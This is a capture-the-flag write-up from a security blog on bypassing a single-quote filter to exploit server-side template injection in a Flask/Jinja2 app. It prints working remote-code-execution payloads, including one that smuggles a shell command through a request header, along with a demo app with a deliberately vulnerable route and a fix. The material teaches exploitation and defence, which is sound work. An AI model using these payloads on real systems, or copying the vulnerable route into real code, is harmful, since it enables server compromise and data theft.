SSTI - Bypassing Single Quotes Filter
2023-10-16 00:34:10 Author: infosecwriteups.com

Arun balaji

InfoSec Write-ups

In this blog, I would like to show how to exploit a server-side template injection (SSTI) in a Flask application without using single quotes.

Hello, everyone! Today, I’m going to demonstrate how you can exploit a server-side template injection vulnerability, even when certain characters are blacklisted. Let’s get started.

Server-side template injection (SSTI) is a web application vulnerability that arises when user input is embedded into the source of a template before the template engine renders it, so the input is parsed as template syntax instead of being treated as data.

When developers build a template by concatenating unsanitized user input into the template string (instead of passing the input to the template as a variable), the engine evaluates whatever expressions the attacker supplies. Because most template languages expose the underlying language's objects, this frequently escalates to Remote Code Execution (RCE) on the server.

We are presented with an input field that prompts us to enter our name and, in return, generates a personalized welcome message.

I used the Wappalyzer browser extension to identify the technologies used on the website, and it revealed that the application runs on Flask, whose template engine is Jinja2. To confirm the presence of SSTI, I submitted the classic probe {{7*7}} in the input field.

{{ 7*7 }} = 49

The expression was evaluated rather than echoed back as text, which confirms SSTI. Now we need to craft a payload that exploits it.

So, I started creating the payload using the Flask methods I’m familiar with.

My initial payload: {{url_for.__globals__.os.popen('ls').read()}}

However, this payload didn’t work as expected because the application was filtering out certain characters.

I identified the filtered character by testing each character one by one, and found that single quotes (') are not allowed.

So I came up with another idea after doing some research on how to construct an SSTI payload without using quotes.

The idea is to use the request object that Flask makes available in every template context. It is the same request proxy a view function sees, so a template expression can read the headers of the request that is being rendered, and a header value needs no quotes inside the payload.

payload: {{url_for.__globals__.os.popen(request.headers.hack).read()}}

Now we supply the command to execute in a request header named hack. To do this, intercept the request that submits the name in Burp Suite, add the hack header carrying the command, and forward the modified request:

GET /{{url_for.__globals__.os.popen(request.headers.hack).read()}} HTTP/1.1
hack: cat ../flag.txt
Host: chal.pctf.competitivecyber.club:5555
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://chal.pctf.competitivecyber.club:5555/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

Note: The flag is located in the root of the app, one directory above the working directory the app runs from, so the command reads ../flag.txt from the parent directory.

Let me break down the methods I used:

  1. url_for - A Flask function that builds a URL for a named endpoint. Here it is only a foothold: it is a Python function that Flask exposes in every template context, and every Python function carries a __globals__ attribute.
  2. __globals__ - The dictionary of global names in the module where url_for is defined. That Flask module imports os, so the os module is reachable from the template. Jinja2 falls back from attribute access to item lookup, which is why .os works on a dictionary.
  3. popen() - os.popen runs the given string as a shell command and returns a file-like object connected to its standard output.
  4. request.headers.<name_of_the_header> - Reads the value of the named header from the incoming request; header names are matched case-insensitively, and the same attribute-to-item fallback makes the dotted form work.
  5. read() - Reads the output that the popen() command wrote to its standard output, so it ends up in the rendered response.
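The following is an added example, not code from the original write-up or from the challenge itself: a minimal Flask app that reproduces the behaviour described above, beside a fixed route. The route names /vuln and /safe, the query parameter name, the single-quote blacklist and the echo command sent in the header are assumptions made for the example. The /vuln route splices the input into the template source and rejects single quotes; the /safe route renders a constant template and passes the input as a context variable. demo() sends the probes from the write-up through Flask's test client, which shows the quoted payload being blocked, the header-carried command running, and the same input being inert against the fixed route.

```python
# Added example: a Flask app that reproduces the SSTI behaviour described in
# the write-up. Route names, parameter name and the blacklist are assumptions.
import os  # used indirectly: the payload reaches os through url_for.__globals__
from flask import Flask, render_template_string, request

app = Flask(__name__)


def contains_single_quote(value):
    """The character blacklist assumed in this example: reject any single quote."""
    return "'" in value


@app.route("/vuln")
def vuln():
    name = request.args.get("name", "")
    if contains_single_quote(name):
        return "forbidden", 400
    # BUG: user input becomes part of the template source, so Jinja2 parses
    # {{ ... }} in it as template syntax instead of treating it as data.
    return render_template_string("Welcome, " + name + "!")


@app.route("/safe")
def safe():
    name = request.args.get("name", "")
    # Fix: the template source is a constant string; the input is only a
    # context variable that Jinja2 substitutes (and autoescapes) at render time.
    return render_template_string("Welcome, {{ name }}!", name=name)


def probe(path, payload, headers=None):
    """Send a payload to a route via the test client and return the body text."""
    with app.test_client() as client:
        resp = client.get(path, query_string={"name": payload}, headers=headers or {})
        return resp.get_data(as_text=True)


def demo():
    """Run the three probes from the write-up plus the fixed route; return results."""
    results = {}
    # 1. Detection probe: the expression is evaluated, not echoed.
    results["arith"] = probe("/vuln", "{{7*7}}")
    # 2. The initial payload is blocked because it contains single quotes.
    results["quoted"] = probe(
        "/vuln", "{{url_for.__globals__.os.popen('id').read()}}"
    )
    # 3. The quote-free payload: the command travels in the 'hack' header and
    #    request.headers.hack reads it back inside the template.
    results["header"] = probe(
        "/vuln",
        "{{url_for.__globals__.os.popen(request.headers.hack).read()}}",
        headers={"hack": "echo ssti-via-header"},
    )
    # 4. Against the fixed route the detection probe comes back verbatim.
    results["safe"] = probe("/safe", "{{7*7}}")
    return results


if __name__ == "__main__":
    for label, body in demo().items():
        print(f"{label}: {body!r}")
```

The fix is not a better blacklist. Rendering the constant template "Welcome, {{ name }}!" with name=name means Jinja2 never parses the user's text, so {{7*7}} is returned literally. If an application genuinely must render templates supplied by users, they should be rendered in jinja2.sandbox.SandboxedEnvironment, which refuses access to underscore-prefixed attributes such as __globals__.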

FLAG : PCTF(wHOS7H47PoKEmoN)

Server-Side Template Injection (SSTI) is a critical web application vulnerability, and it is essential for both developers and security professionals to understand how it works and how to prevent it. The fix is to never build a template from user input: pass the input to the template as a context variable so the engine substitutes it instead of parsing it, and render any template that must come from users in a sandboxed environment. As this write-up shows, blacklisting characters such as single quotes is not a mitigation, because the template engine offers many other ways to reach the same objects.

That’s all for today, everyone. I’ll be back soon with another informative write-up. Until then, stay safe and stay secure!


Source: https://infosecwriteups.com/ssti-bypassing-single-quotes-filter-dc0ee4e4f011?source=rss----7b722bfd1b8d---4